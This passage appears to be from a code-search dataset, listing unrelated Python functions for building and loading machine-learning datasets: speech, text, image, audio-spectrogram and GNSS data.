result.overlay(segment, position=delay)\n delay += increment\n\n tmpfile = ''\n with tempfile.NamedTemporaryFile() as f:\n tmpfile = f.name\n result.export(tmpfile, format=\"wav\")\n 
logger.info('{} 语音合成成功,合成路径:{}'.format(self.SLUG, tmpfile))\n return tmpfile", "def generate_syntetic_data( self ):\n label_list = []\n img_ground_truth = np.zeros( ( self.img_h, self.img_w ), dtype = np.float32 )\n img = np.zeros( ( self.img_h, self.img_w, 3 ), dtype = np.float32 )\n class_blue = np.zeros( ( self.img_h, self.img_w ), dtype = np.float32 )\n class_red = np.zeros( ( self.img_h, self.img_w ), dtype = np.float32 )\n\n '''line, square, grill, rectangle, cross'''\n if self.option_shape == 'line':\n sample_type = 0\n elif self.option_shape == 'circle':\n sample_type = 1\n elif self.option_shape == 'rectangle':\n sample_type = 2\n else: \n sample_type = np.random.randint( 3 ) #0,1,2\n\n if sample_type == 0:\n self.generate_line( img_ground_truth, img, class_blue, class_red )\n elif sample_type == 1:\n self.generate_circle( img_ground_truth, img, class_blue, class_red )\n else:\n self.generate_rectangle( img_ground_truth, img, class_blue, class_red )\n\n label_list.append( class_blue )\n label_list.append( class_red )\n # 2 classes generates\n label_all = np.dstack( label_list ).astype( np.float32 ) \n r, g, b = cv2.split( img )\n img_bgr = cv2.merge( [ b, g, r ] )\n\n gen_adj = GenerateAdjMatrx( type_dist = self.type_dist )\n A_gt = gen_adj.adjmatrx_groundthuth( img_ground_truth )\n\n B_in = gen_adj.adjmatrx_groundthuth(img_ground_truth * 0)\n\n return img_bgr, img_ground_truth, label_all, A_gt, B_in", "def generate_corpus():\n data = load_data()\n questions = [s.split(' ', 1)[1].lower() for s in data]\n return questions", "def test_get_voice_datasets(self):\n pass", "def gen_datafiles():\n\tnum_reads = 10000\n\tnum_samples = 100\n\tgen_sequences('hg38.fa', num_reads, num_samples, 1, 'hg38_train.txt')\n\tgen_sequences('HIV-1.fasta', num_reads, num_samples, 0, 'HIV-1_train.txt')\n\tgen_sequences('hg38.fa', num_reads, num_samples, 1, 'hg38_test.txt')\n\tgen_sequences('HIV-1.fasta', num_reads, num_samples, 0, 'HIV-1_test.txt')", "def create_dataset(dataset_type, soruce, opts): \n\n p = PreProcessor(dataset_type, opts)\n\n # If we are NOT running \"implementation.py\", we read the data from file\n if dataset_type == \"train\" or dataset_type == \"dev\" or dataset_type == \"test\":\n path_to_data = soruce\n p.read_labelled_data(path_to_data) \n # Otherwise, we read the sentence that \"implementation.py\" gave us\n elif dataset_type == \"submit\":\n submission_sentence = soruce\n p.read_test_data(submission_sentence)\n\n # Encode all the data to a list of torchTensors\n encoded_tokens, encoded_pred, encoded_tokens_pos, encoded_labels = p.encode_all_data()\n # Create SRL dataset\n dataset = SRLDataset(x=encoded_tokens, pr=encoded_pred, p=encoded_tokens_pos, y=encoded_labels)\n print(\"{} dataset size is {}\".format(dataset_type, len(dataset)))\n\n if dataset_type == \"train\" or dataset_type == \"dev\" or dataset_type == \"test\":\n return dataset\n elif dataset_type == \"submit\":\n return dataset, p.list_l_original_predicates", "def run_deep_speech():\n global FLAGS\n tf.set_random_seed(FLAGS.seed)\n # Data precessing\n tf.logging.info(\"Data Processing...\")\n train_speech_dataset = generate_dataset(FLAGS.data_dir, partition=\"train\")\n eval_speech_dataset = generate_dataset(FLAGS.data_dir, partition=\"dev\")\n\n # Number of label classes. 
Label string is \"[a-z]' -\"\n num_classes = len(train_speech_dataset.speech_labels)\n\n # not available in 1.4\n distribution_strategy = distribution_utils.get_distribution_strategy(num_gpus=FLAGS.num_gpus)\n run_config = es.RunConfig(train_distribute=distribution_strategy, session_config=get_session_config())\n\n estimator = es.Estimator(\n model_fn=model_fn, model_dir=FLAGS.model_dir, config=run_config, params={\"num_classes\": num_classes})\n\n run_params = {\n \"batch_size\": FLAGS.batch_size,\n \"train_epochs\": FLAGS.train_epochs,\n \"rnn_hidden_size\": FLAGS.rnn_hidden_size,\n \"rnn_hidden_layers\": FLAGS.rnn_hidden_layers,\n \"rnn_type\": FLAGS.rnn_type,\n \"is_bidirectional\": FLAGS.is_bidirectional,\n \"use_bias\": FLAGS.use_bias\n }\n\n benchmark_logger = logger.get_benchmark_logger()\n benchmark_logger.log_run_info(\n model_name=\"deep_speech\", dataset_name=\"LibriSpeech\", run_params=run_params, test_id=FLAGS.benchmark_test_id)\n\n train_hooks = hooks_helper.get_train_hooks(FLAGS.hooks, model_dir=FLAGS.model_dir, batch_size=FLAGS.batch_size)\n per_replica_batch_size = distribution_utils.per_replica_batch_size(FLAGS.batch_size, FLAGS.num_gpus)\n\n def input_fn_train():\n return train_speech_dataset.input_fn(batch_size=per_replica_batch_size)\n\n def input_fn_eval():\n return eval_speech_dataset.input_fn(batch_size=per_replica_batch_size)\n\n # total_training_cycle = FLAGS.train_epochs // FLAGS.epochs_between_evals\n total_training_cycle = FLAGS.train_epochs\n\n for cycle_index in range(total_training_cycle):\n tf.logging.info(f\"Starting train cycle: {cycle_index + 1} / {total_training_cycle}\")\n\n # Perform batch_wise dataset shuffling\n train_speech_dataset.batch_wise_shuffle(FLAGS.batch_size)\n\n # Train\n estimator.train(input_fn=input_fn_train, hooks=train_hooks)\n\n # Evaluation\n tf.logging.info(\"Starting to evaluate...\")\n eval_results = evaluate_model(estimator, speech_labels=eval_speech_dataset.speech_labels,\n entries=eval_speech_dataset.entries, input_fn_eval=input_fn_eval)\n\n # Log the WER and CER results.\n benchmark_logger.log_evaluation_result(eval_results)\n tf.logging.info(\n f\"Iteration {cycle_index + 1}: WER = {eval_results[_WER_KEY]:.2f}, CER = {eval_results[_CER_KEY]:.2f}\")", "def gen_data(self):\n\n # 1,read the source text\n inputs, labels = self.read_data()\n print(\"read finished\")\n\n # 2. 
word label index\n word_to_index, label_to_index = self.gen_word_label_index()\n # print(\"word_to_index\",word_to_index)\n # print(\"label_to_index\",label_to_index)\n print(\"vocab process finished\")\n #\n # 3,input to index\n inputs_idx = self.trans_to_index(inputs, word_to_index)\n # print((inputs_idx))\n print(\"index transform finished\")\n #\n # 4, padding\n inputs_idx = self.padding(inputs_idx, self._sequence_length)\n # print(inputs_idx)\n print(\"padding finished\")\n\n # 6,label to index\n labels_idx = self.trans_label_to_index(labels, label_to_index)\n print(\"label index transform finished\")\n\n return np.array(inputs_idx), np.array(labels_idx)", "def as_dataset(self) -> \"Dataset\":\n \n freq_def = {\n 1: \"L1\", # G\n 2: \"L2\", # G\n 5: \"L5\", # G\n 20: \"L2C\", # G\n 101: \"L1\", # R\n 102: \"L2\", # R\n 201: \"E1\", # E \n 205: \"E5a\", # E\n 206: \"E6\", # E\n 207: \"E5b\", # E\n 208: \"E5\", # E\n 302: \"B1_2\", # C\n 306: \"B3\", # C\n 307: \"B2b\", # C\n }\n\n float_fields = {\n \"amplitude\": None,\n \"azimuth\": \"radian\",\n \"peak2noise\": None, \n \"reflection_height\": \"meter\", \n }\n\n # Initialize dataset\n dset = dataset.Dataset()\n if not self.data:\n log.warn(\"No data in {self.file_path}.\")\n return dset\n dset.num_obs = len(self.data[\"time\"])\n\n # Add text fields\n satellite = list()\n system = list()\n for sat in self.data[\"satellite\"]:\n if sat >= 1 and sat < 100: # GPS satellites\n system.append(\"G\")\n satellite.append(\"G\" + str(int(sat)).zfill(2))\n elif sat >= 101 and sat < 200: # GLONASS satellites\n system.append(\"R\")\n satellite.append(\"R\" + str(int(sat))[1:3])\n elif sat >= 201 and sat < 300: # Galileo satellites\n system.append(\"E\")\n satellite.append(\"E\" + str(int(sat))[1:3])\n elif sat >= 301 and sat < 400: # BeiDou satellites\n system.append(\"C\")\n satellite.append(\"C\" + str(int(sat))[1:3])\n else:\n log.fatal(\"GNSSREFL satellite number {sat} is not defined. 
Valid satellite numbers are between [1-399].\")\n\n dset.add_text(\n name=\"system\", \n val=system, \n write_level=\"operational\",\n )\n\n dset.add_text(\n name=\"satellite\", \n val=satellite, \n write_level=\"operational\",\n )\n\n dset.add_text(\n name=\"frequency\", \n val=[freq_def[v] for v in self.data[\"frequency\"]], \n write_level=\"operational\",\n ) \n \n # Add time field\n dset.add_time(\n name=\"time\", \n val=self.data[\"time\"], \n scale=\"utc\", \n fmt=\"datetime\", \n write_level=\"operational\",\n )\n \n # Add float fields\n for field in float_fields.keys():\n if field not in self.data.keys():\n log.warn(f\"Field '{field}' does not exist in file {self.meta['__data_path__']}.\")\n continue\n \n value = np.deg2rad(self.data[field]) if field == \"azimuth\" else self.data[field]\n unit = \"\" if float_fields[field] is None else float_fields[field]\n \n dset.add_float(name=field, val=value, unit=unit, write_level=\"operational\")\n \n return dset", "def _init_dataset(self):\n chars = set()\n with open(self.file_path + \"/words.txt\", 'r') as input_file:\n for line in input_file:\n line_split = line.strip().split('\\t')\n file_name = self.file_path+\"/words/\"+line_split[1]\n gt_text = line_split[0]\n chars = chars.union(set(list(gt_text)))\n self.samples.append((file_name, gt_text))\n input_file.close()\n\n self.char_set = sorted(list(chars))", "def generate_sentence_embeddings():\n generate_embeddings_sentence(\"Data/en-train.json\", \"Data_Sent_Embds/en_sent.pkl\")\n generate_embeddings_sentence(\"Data/es-train.json\", \"Data_Sent_Embds/es_sent.pkl\")\n generate_embeddings_sentence(\"Data/pr-train.json\", \"Data_Sent_Embds/pr_sent.pkl\")", "def speech_to_text(\n audio_ms: Tuple[int, int],\n label_symbols: Sequence[str],\n label_len: Tuple[int, int],\n audio_channels: int = 1,\n audio_dtype: torch.dtype = torch.int16,\n audio_device: torch.device = torch.device(\"cpu\"),\n audio_pin_memory: bool = False,\n audio_sample_rate: int = 16000,\n audio_transform: Optional[Callable[[torch.Tensor], torch.Tensor]] = None,\n label_transform: Optional[Callable[[str], str]] = None,\n) -> SpeechToTextGen:\n if audio_ms[0] > audio_ms[1]:\n raise ValueError(\"audio_ms lower bound must be > upper bound\")\n\n if audio_ms[0] <= 0:\n raise ValueError(\"audio_ms must be greater than 0\")\n\n if label_len[0] > label_len[1]:\n raise ValueError(\"label_len lower bound must be > upper bound\")\n\n if label_len[0] < 0:\n raise ValueError(\"label_len must be greater than or equal to 0\")\n\n if audio_channels < 1:\n raise ValueError(\"audio_channels must be >= 1\")\n\n dtypes = [torch.float64, torch.float32, torch.int32, torch.int16]\n if audio_dtype not in dtypes:\n raise ValueError(f\"audio_dtype must be in {dtypes}\")\n\n rnd = random.Random()\n\n def generator(key: int) -> Tuple[torch.Tensor, str]:\n rnd.seed(a=key)\n\n if label_symbols:\n label = \"\".join(\n rnd.choices(label_symbols, k=rnd.randint(*label_len))\n )\n else:\n label = \"\"\n\n audio_samples = math.ceil(\n rnd.randint(*audio_ms) * (audio_sample_rate / 1000)\n )\n if audio_channels > 1:\n audio_size: Union[Tuple[int], Tuple[int, int]] = (\n audio_channels,\n audio_samples,\n )\n else:\n audio_size = (audio_samples,)\n\n audio = torch.empty(\n audio_size,\n dtype=audio_dtype,\n device=audio_device,\n pin_memory=audio_pin_memory,\n )\n\n if audio_dtype.is_floating_point:\n audio.normal_(mean=0, std=1)\n elif audio_dtype == torch.int16:\n audio.random_(\n -(2 ** 15), 2 ** 15\n ) # random_ subtracts 1 from upper\n else:\n 
audio.random_(\n -(2 ** 31), 2 ** 31\n ) # random_ subtracts 1 from upper\n\n if audio_transform is not None:\n audio = audio_transform(audio)\n\n if label_transform is not None:\n label = label_transform(label)\n\n return audio, label\n\n return generator", "def samples(self, gp):\r\n raise NotImplementedError", "def create_lm_dataset(opt, logger=None):\n # Using spacy to tokenize text\n spacy_en = spacy.load('en')\n # Add <unk> special case is due to wiki text which has raw <unk>\n spacy_en.tokenizer.add_special_case(\"<unk>\", [{ORTH: \"<unk>\"}])\n\n def tokenize(text):\n \"\"\"tokenize sentence\"\"\"\n return [item.text for item in spacy_en.tokenizer(text)]\n\n is_lower = True\n if opt.data_type == \"ptb\":\n is_lower = False\n TEXT = torchtext.data.Field(\n sequential=True,\n tokenize=tokenize,\n lower=is_lower\n )\n\n resources_dir = os.path.expanduser(opt.resources_dir)\n if opt.data_type == \"wiki3\":\n train, valid, test = torchtext.datasets.WikiText103.splits(\n text_field=TEXT,\n root=resources_dir\n )\n if opt.data_type == \"wiki2\":\n train, valid, test = torchtext.datasets.WikiText2.splits(\n text_field=TEXT,\n root=resources_dir\n )\n if opt.data_type == \"ptb\":\n train, valid, test = torchtext.datasets.PennTreebank.splits(\n text_field=TEXT,\n root=resources_dir\n )\n\n if logger:\n logger.info(f\"train token: {len(train.examples[0].text)}\")\n logger.info(f\"test token: {len(test.examples[0].text)}\")\n logger.info(f\"valid token: {len(valid.examples[0].text)}\")\n\n device = torch.device(opt.device)\n if opt.input_vector is not None:\n opt.input_vector = os.path.expanduser(opt.input_vector)\n head, tail = os.path.split(opt.input_vector)\n torchtext_vectors = torchtext.vocab.Vectors(name=tail, cache=head)\n torchtext_vectors.vectors.to(device)\n # print(f\"len: {len(torchtext_vectors.stoi)}\")\n # print(f\"size: {torchtext_vectors.vectors.size()}\")\n # Here the list of list is to simulate the real dataset\n # where first dim is sentence and second is word.\n limited_train = [[word] for word in torchtext_vectors.stoi.keys()]\n TEXT.build_vocab(limited_train, vectors=torchtext_vectors)\n else:\n TEXT.build_vocab(train)\n\n train_iter, val_iter, test_iter = torchtext.data.BPTTIterator.splits(\n (train, valid, test),\n batch_size=opt.batch_size,\n bptt_len=opt.bptt_len,\n device=device,\n repeat=False\n )\n return (TEXT, train_iter, test_iter, val_iter)", "def _generate_samples(samples_data_table=None):\n samples_data_table = samples_data_table or dict()\n\n con_name = f\"Auto_Sample_Test_{datetime.now()}\"\n con_result_soup = BeautifulSoup(_post_con(con_name), \"xml\")\n con_uri = con_result_soup.find(\"con:container\")[\"uri\"]\n\n sample_list = list()\n for i in range(1, 97, 2):\n well = (\n 'ABCDEFGH'[(i - 1) % 8] + ':' + '%01d' % ((i - 1) // 8 + 1,))\n letter = 'ABCDEFGH'[i % 8]\n to_add = api_types.Sample(f\"test{i}{letter}\")\n to_add.location = well\n to_add.con = api_types.Container(\n con_name,\n \"96 well plate\",\n \"\",\n con_uri)\n\n for data_name, data_value in samples_data_table.items():\n if \"udf\" in data_name:\n udf_name = data_name.strip(\"udf_\")\n to_add.udf_to_value[udf_name] = data_value\n elif \"adapter\" in data_name:\n to_add.adapter = data_value\n sample_list.append(to_add)\n return sample_list", "def nao_speech(possible_sentences):\n\n print(random.choice(possible_sentences))", "def generate_samples(self, data_dir, tmp_dir, dataset_split):\n train = dataset_split == problem.DatasetSplit.TRAIN\n dataset_path = (\"train.tok.clean.bpe.32000\"\n if 
train else \"newstest2013.tok.bpe.32000\")\n train_path = _get_wmt_ende_bpe_dataset(tmp_dir, dataset_path)\n\n # Vocab\n token_path = os.path.join(data_dir, self.vocab_filename)\n if not tf.gfile.Exists(token_path):\n token_tmp_path = os.path.join(tmp_dir, self.vocab_filename)\n tf.gfile.Copy(token_tmp_path, token_path)\n with tf.gfile.GFile(token_path, mode=\"r\") as f:\n vocab_data = \"<pad>\\n<EOS>\\n\" + f.read() + \"UNK\\n\"\n with tf.gfile.GFile(token_path, mode=\"w\") as f:\n f.write(vocab_data)\n\n return text_problems.text2text_txt_iterator(train_path + \".en\",\n train_path + \".de\")", "def generate_embeddings_sentence_test_data(data, path_out):\n flair.device = torch.device('cpu')\n dicts = []\n # init multilingual BERT\n bert_embedding = TransformerDocumentEmbeddings('bert-base-multilingual-cased')\n counter = 0\n for entry in data:\n print(\"Counter: \", counter)\n counter += 1\n text = entry[\"sentence\"]\n id = entry[\"id\"]\n sent = Sentence(text)\n bert_embedding.embed(sent)\n vec = sent.get_embedding().detach().numpy()\n dicts.append((id,vec))\n gc.collect()\n result = dicts\n file = open(path_out, \"wb\")\n pickle.dump(result, file)\n file.close()\n return result", "def samples(self):\n if not self._samples:\n self._samples = defaultdict(list)\n blobs = self.blobs()\n sequencing = self._get_entities('sequencing')\n for s in self._get_entities('sample'):\n s = sample_factory(s, workspace=self, blobs=blobs, sequencing=sequencing, avro_path=self.avro_path)\n self._samples[s.subject_id].append(s)\n if s.missing_sequence:\n self.missing_sequence = s.missing_sequence\n return self._samples", "def _raw_data(data_path=None, backwards=False):\n train_path = \"dataset/treebank2/raw/wsj/\"\n test_path = \"dataset/SAT_Questions/\"\n question, answer = get_test_data(test_path)\n\n word_to_id = _build_vocab(train_path) \n train_data, train_sentences, train_data_in_list_of_lists = _file_to_word_ids(train_path, word_to_id, True, backwards)\n test_data, test_sentences, test_data_in_list_of_lists = _file_to_word_ids(test_path, word_to_id, False, backwards)\n vocabulary = len(word_to_id)\n return word_to_id, train_data, test_sentences, test_data_in_list_of_lists, question, answer", "def generate_samples(self, data_dir, tmp_dir, dataset_split):\r\n train = dataset_split == problem.DatasetSplit.TRAIN\r\n dataset_path = (\"train.tok.clean.bpe.32000\"\r\n if train else \"newstest2013.tok.bpe.32000\") # da controllare\r\n train_path = _get_wmt_enit_bpe_dataset(tmp_dir, dataset_path)\r\n\r\n # Vocab\r\n token_path = os.path.join(data_dir, self.vocab_filename)\r\n if not tf.gfile.Exists(token_path):\r\n token_tmp_path = os.path.join(tmp_dir, self.vocab_filename)\r\n tf.gfile.Copy(token_tmp_path, token_path)\r\n with tf.gfile.GFile(token_path, mode=\"r\") as f:\r\n vocab_data = \"<pad>\\n<EOS>\\n\" + f.read() + \"UNK\\n\"\r\n with tf.gfile.GFile(token_path, mode=\"w\") as f:\r\n f.write(vocab_data)\r\n\r\n return text_problems.text2text_txt_iterator(train_path + \".en\",\r\n train_path + \".it\")", "def construct_dataset(tri2index, num_examples=100, qap_path=\"./dataset/qa_pairs.dump\",\n label_path=\"./dataset/labels.dump\"):\n Xpair = []\n Y = []\n with open(DATA_PATH) as f:\n lines = csv.reader(f, delimiter=\"\\t\")\n i = 0\n for line in lines:\n q_processed = char_trigram_creator(preprocess(line[3]))\n a_processed = char_trigram_creator(preprocess(line[4]))\n # get the index of the array\n q_index = [tri2index[qp] for qp in q_processed]\n a_index = [tri2index[ap] for ap in a_processed]\n # 
append dataset\n Xpair.append((q_index, a_index)) # list of tuples\n Y.append(line[5].replace(\"\\n\", \"\"))\n # if i >= num_examples : break\n i += 1\n f.close()\n # shuffle the dataset\n Xs = np.asarray(Xpair[1:]) # discard the header\n Ys = np.asarray(Y[1:])\n perm = np.random.permutation(len(Xs))\n Xs = Xs[perm]\n Ys = Ys[perm]\n pickle.dump(Xs, open(qap_path, \"wb\"))\n pickle.dump(Ys, open(label_path, \"wb\"))", "def create_sample(self, sent, head_pred_id):\n return pandas.DataFrame({\"word\": sent,\n \"run_id\": [-1] * len(sent), # Mock running id\n \"head_pred_id\": head_pred_id})", "def create_sample(self, sent, head_pred_id):\n return pandas.DataFrame({\"word\": sent,\n \"run_id\": [-1] * len(sent), # Mock running id\n \"head_pred_id\": head_pred_id})", "def prepare(self):\n # get data from file\n train_data, test_data = return_speechacts()\n # y are the speechacts or 'labels'\n y_train = [t.split(' ')[0] for t in train_data]\n y_test = [t.split(' ')[0] for t in test_data]\n # x are the sentences\n x_train = [\" \".join(t.split(' ')[1:]) for t in train_data]\n x_test = [\" \".join(t.split(' ')[1:]) for t in test_data]\n # use the tokenizer and padding from keras to assign arrays of integers\n # to sentences, out of vocabulary token is 1\n self.tokenizer_x = Tokenizer(oov_token=1)\n self.tokenizer_x.fit_on_texts(x_train + x_test)\n xt_train = self.tokenizer_x.texts_to_sequences(x_train)\n xt_train = pad_sequences(xt_train, maxlen=self.sentence_size,\n dtype='int32')\n xt_test = self.tokenizer_x.texts_to_sequences(x_test)\n xt_test = pad_sequences(xt_test, maxlen=self.sentence_size,\n dtype='int32')\n # vocab is the number of words in our vocabulary\n self.vocab = len(self.tokenizer_x.word_index) + 1\n # do the same for labels\n self.tokenizer_y = Tokenizer()\n self.tokenizer_y.fit_on_texts(y_train + y_test)\n yt_train = self.tokenizer_y.texts_to_sequences(y_train)\n yt_train = [t[0] for t in yt_train]\n yt_train = to_categorical(yt_train)\n yt_test = self.tokenizer_y.texts_to_sequences(y_test)\n yt_test = [t[0] for t in yt_test]\n yt_test = to_categorical(yt_test)\n self.x_train = x_train\n self.y_train = y_train\n self.x_test = x_test\n self.y_test = y_test\n self.xt_train = xt_train\n self.yt_train = yt_train\n self.xt_test = xt_test\n self.yt_test = yt_test", "def getSampleDataSet():\n ds = [{\"name\": \"Denise\", \"sex\": \"F\"},\n \t{\"name\": \"Paul\", \"sex\": \"M\"}]\n return ds", "def load_train_dataset(data_dir, word_list, silence_percentage, noise_percentage):\n validation_percentage, testing_percentage = 0.1, 0.1\n temp_list = []\n\n #wav_lists = os.path.join(data_dir, *, '*.wav')\n for word_l in word_list:\n #wav_word_list = os.path.join(data_dir, word_l)\n wav_list = os.path.join(data_dir, word_l, '*.wav')\n for file in gfile.Glob(wav_list):\n _, word = os.path.split(os.path.dirname(file))\n word = word.lower()\n\n if which_set(file, validation_percentage, testing_percentage) == 'training':\n rate, signal = load_wav(file);\n signal_and_noise = add_noise(signal, rate, 1, os.path.join(data_dir,'_background_noise_'), noise_percentage)\n \n feature = psf.mfcc(signal_and_noise, rate, nfilt = 40,numcep = 12, appendEnergy = False)\n #if feature.shape[0] != 99:\n # print(str(len(signal)) + \" \" + str(rate))\n temp_list.append({'feature': feature, 'label': word_l})\n\n # hotspot\n #silence = len(X_train) * silence_percentage\n silence = int(math.ceil(len(temp_list) * silence_percentage / 100))\n for _ in range(silence):\n temp_list.append({'feature': 0, 'label': 
\"_silence_\"})\n\n random.shuffle(temp_list)\n\n X_train = np.zeros((len(temp_list), 99, 12))\n Y_train = np.zeros( len(temp_list) )\n\n for i in range(len(X_train)):\n X_train[i] = temp_list[i]['feature']\n Y_train[i] = word2index(temp_list[i]['label'])\n\n return X_train, Y_train", "def gen_random_samples():\n if os.path.exists('Song_Samples'):\n pass\n else:\n os.mkdir('Song_Samples')\n for filename in os.listdir(\"Songs\"):\n rate, data = wavfile.read(os.path.join(\"Songs\", filename))\n song_duration = len(data) // rate\n start_point = randint(0, song_duration - SAMPLE_DURATION)\n end_point = start_point + SAMPLE_DURATION\n subprocess.call(['ffmpeg', '-i', os.path.join(\"Songs\", filename),\n '-ss', str(datetime.timedelta(seconds=start_point)), '-to',\n str(datetime.timedelta(seconds=end_point)), '-y', os.path.join(\"Song_Samples\", filename)])", "def samples(self, gp, Y_metadata=None, samples=1):\n raise NotImplementedError(\"\"\"May be possible to use MCMC with user-tuning, see\n MCMC_pdf_samples in likelihood.py and write samples function\n using this, beware this is a simple implementation\n of Metropolis and will not work well for all likelihoods\"\"\")", "def create_samples(self):\n sample_list = []\n genes = []\n for record in range(len(self.data_dict[\"samples\"])):\n sample_id = self.data_dict[\"samples\"][record]\n genes_cols = list(self.data_dict.keys())[2:]\n for gene in genes_cols:\n genes.append(self.data_dict[gene][record])\n label = self.data_dict[\"type\"][record]\n sample_list.append(Sample(sample_id, genes, label))\n genes = []\n return sample_list", "def make_dataset():\n\n\tnumberOfTrials = dataset_params.num_of_samples\n\tnumberOfTrials_train = int(numberOfTrials*0.8)\n\tnumberOfTrials_test = int(numberOfTrials*0.2)\n\n\tprint(\"==================================================\")\n\tprint(\"1. Generating Train images ......\")\n\tprint(\"\\nTrain image per variation\", numberOfTrials_train)\n\tmakeDataset(numberOfTrials_train, \"train\")\n\n\tprint(\"==================================================\")\n\tprint(\"2. 
Generating Test images ......\")\n\tprint(\"\\nTest image per variation\", numberOfTrials_test)\n\tmakeDataset(numberOfTrials_test, \"test\")\n\n\tprint(\"==================================================\")\n\tprint(\"Done!!!\")", "def main():\n # Load and prep training files\n raw_speech_text = hg.load_training_file('trump_train.txt')\n speech_text = hg.prep_training(raw_speech_text)\n tweet_data = load_tweets('trump_tweets.json')\n raw_tweets = \"\"\n for dct in tweet_data:\n raw_tweets += \"{} \".format(dct['text'])\n tweets = hg.prep_training(raw_tweets)\n corpus = speech_text + tweets\n corpus = strip_punctuation(corpus)\n dict_1 = hg.map_one_to_one(corpus)\n dict_2 = hg.map_two_to_one(corpus)\n text = []\n \n # Introduction\n print(\"\\nTrump Speech Generator\\n\")\n print(\"Select words to add to speech\")\n print(\"\\'x\\' to exit\")\n print(\"\\'p\\' to add punctuation\")\n print(\"Select \\'p\\' before selecting the word you want to punctuate\")\n\n # Select first word\n options = corpus\n print ()\n selection = select_word(corpus)\n text.append(selection)\n \n # Select second word\n last = text[0]\n options = word_after_one(last, dict_1)\n print_text(text)\n selection = select_word(options)\n text.append(selection)\n \n # Select subsequent word\n while True:\n last = \"{} {}\".format(text[-2].strip(punctuation),\n text[-1].strip(punctuation))\n options = word_after_two(last, dict_2)\n if options == []:\n last = last.split()[1]\n options = word_after_one(last, dict_1)\n while options == []:\n last = random.choice(corpus)\n options = word_after_one(last, dict_1)\n print_text(text)\n selection = select_word(options)\n text.append(selection)\n \n print_text(text)", "def create_melspectrogram_dataset(label_folder='electronic_music/Trance_label/Train/', save_folder='song_mel_label_data',\n sr=44100, n_mels=128, n_fft=2048, hop_length=512, song_duration=180.0,\n create_data=False):\n if create_data:\n # get list of all labels\n os.makedirs(save_folder, exist_ok=True)\n labels = [path for path in os.listdir(label_folder) if os.path.isdir(label_folder + path)]\n\n # iterate through all lables, songs and find mel spectrogram\n for label in labels:\n print('{} \\n'.format(label))\n label_path = os.path.join(label_folder, label)\n label_songs = os.listdir(label_path)\n\n for song in label_songs:\n print(song)\n song_path = os.path.join(label_path, song)\n\n # Create mel spectrogram for song_duration in the middle of the song and convert it to the log scale\n audio = MP3(song_path)\n audio_lenght = int(audio.info.length)\n audio_middle = (audio_lenght - int(song_duration))/2\n y, sr = librosa.load(song_path, sr=sr, offset=audio_middle, duration=song_duration)\n S = librosa.feature.melspectrogram(y, sr=sr, n_mels=n_mels, n_fft=n_fft, hop_length=hop_length)\n log_S = librosa.logamplitude(S, ref_power=1.0)\n data = (label, log_S, song)\n\n # Save each song\n save_name = label + '_%%-%%_' + song\n with open(os.path.join(save_folder, save_name), 'wb') as fp:\n dill.dump(data, fp)", "def main():\n # transcribe_audio()\n summarize()", "def tonify(self, tone_generator=None, verbose=False):\n if tone_generator is None:\n tone_generator = ToneGenerator('tonifyoutput.wav')\n tone_generator.file.setnchannels(len(self.sheets))\n # Find the max length (in seconds) of the data sheets\n max_length = 0.0\n for sheet in self.sheets:\n if len(sheet) > max_length:\n max_length = len(sheet)\n nframes = int(max_length * tone_generator.sample_rate)\n tone_generator.file.setnframes(nframes)\n\n tone_strs = []\n 
for d in self.sheets:\n if verbose:\n print \"File:\", d.data.name\n print \"Frequencies:\", self.freqs[self.sheets.index(d)]\n values = []\n tone_generator.setfreqs(self.freqs[self.sheets.index(d)])\n for i in range(0, len(d.times)):\n duration = d.durations[i]\n calls = d.calls[i]\n if verbose:\n print \"\\ttone: (%d, %d, %d) for %f seconds\" % (calls[0], calls[1],\n calls[2], duration)\n tone = tone_generator.get_tone((calls[0], calls[1], calls[2]), duration)\n values.append(str(tone))\n try:\n delta = float((d.times[i + 1] - d.times[i]).seconds)\n if float(delta) - duration < 0.0:\n silence_duration = 0.0\n else:\n silence_duration = float(delta) - duration\n except IndexError:\n break\n if verbose:\n print \"\\tsilence for\", silence_duration,\"seconds\"\n silence = tone_generator.get_silence(silence_duration)\n values.append(str(silence))\n if len(d) < max_length:\n end_silence = tone_generator.get_silence(max_length - len(d))\n values.append(str(end_silence))\n value_str = ''.join(values)\n tone_strs.append(value_str)\n \n if verbose:\n print \"Writing to file... (may take several minutes)\"\n combined = interleave_binarystr(tone_strs)\n tone_generator.file.writeframes(combined)\n if verbose:\n print \"Finished writing.\"\n tone_generator.close()", "def create_mixture_csv(data_type):\n \n workspace = config.workspace\n data_dir = config.data_dir\n speech_dir = os.path.join(data_dir,'{}_speech'.format(data_type))\n noise_dir = os.path.join(data_dir,'{}_noise'.format(data_type)) \n magnification = config.magnification\n fs = config.sample_rate\n \n speech_names = [na for na in os.listdir(speech_dir) if na.lower().endswith(\".wav\")]\n noise_names = [na for na in os.listdir(noise_dir) if na.lower().endswith(\".wav\")]\n \n rs = np.random.RandomState(0)\n out_csv_path = os.path.join(workspace, \"mixture_csvs\", \"%s.csv\" % data_type)\n create_folder(os.path.dirname(out_csv_path))\n \n cnt = 0\n f = open(out_csv_path, 'w')\n f.write(\"%s\\t%s\\t%s\\t%s\\n\" % (\"speech_name\", \"noise_name\", \"noise_onset\", \"noise_offset\"))\n for speech_na in speech_names:\n # Read speech. \n speech_path = os.path.join(speech_dir, speech_na)\n (speech_audio, _) = read_audio(speech_path)\n len_speech = len(speech_audio)\n \n # For training data, mix each speech with randomly picked #magnification noises. \n if data_type == 'train':\n selected_noise_names = rs.choice(noise_names, size=magnification, replace=False)\n # For test data, mix each speech with all noises. \n elif data_type == 'test':\n selected_noise_names = noise_names\n else:\n raise Exception(\"data_type must be train | test!\")\n\n # Mix one speech with different noises many times. \n for noise_na in selected_noise_names:\n noise_path = os.path.join(noise_dir, noise_na)\n (noise_audio, _) = read_audio(noise_path)\n \n len_noise = len(noise_audio)\n\n if len_noise <= len_speech:\n noise_onset = 0\n nosie_offset = len_speech\n # If noise longer than speech then randomly select a segment of noise. 
